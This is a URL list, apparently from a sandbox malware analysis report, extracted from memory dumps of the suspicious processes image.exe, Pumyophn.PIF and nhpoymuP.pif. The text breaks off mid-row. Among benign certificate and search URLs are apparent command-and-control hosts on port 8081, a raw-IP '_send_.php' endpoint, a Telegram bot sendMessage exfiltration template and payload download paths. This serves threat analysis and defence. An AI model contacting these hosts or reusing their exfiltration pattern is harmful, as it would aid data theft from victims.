https://duckduckgo.com/chrome_newtab	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/lB	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CCA000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C9D000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CC5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AEC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C4F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028DA6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028EE6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270D4000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272F6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270AD000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000271B5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026EFC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002705F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027CCF000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fodoknotel.za.com:443/233_Pumyophnrerhv	image.exe, 00000000.00000002.1711881761.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndnL	nhpoymuP.pif, 00000003.00000002.1986029241.000000002F777000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fodoknotel.za.com/233_Pumyophnre	image.exe, 00000000.00000002.1741511764.0000000020BDD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E9E000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C56000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028D81000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CA0000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AC7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C2B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002703B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027191000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027066000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272AE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026ED7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.techniqueqatar.com	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	nhpoymuP.pif, 00000003.00000002.1986029241.000000002F78B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com0	image.exe, 00000000.00000003.1709845321.000000007FCEA000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1744877081.0000000021E00000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1709354096.0000000022711000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1745877801.00000000227BB000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif.0.dr	false		high
https://reallyfreegeoip.org/xml/	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025F24000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/	nhpoymuP.pif, 0000000E.00000002.2964961500.00000000260E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027C70000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2973878513.000000002A705000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000026081000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2974026107.0000000028E02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	nhpoymuP.pif, 00000003.00000002.1986029241.000000002F78B000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F777000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C9D000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028CC5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028AEC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028C4F000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028DA6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028EE6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270D4000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000272F6000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000270AD000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FDE000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.00000000271B5000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000026EFC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.000000002705F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BA7000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025FBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2966303963.0000000027AC1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.0000000025ED1000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E46000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2969311165.0000000028E14000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027224000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2968587842.0000000027256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	nhpoymuP.pif, 00000007.00000002.2966303963.0000000027BCC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964961500.000000002606E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F651000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1986029241.000000002F6BC000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 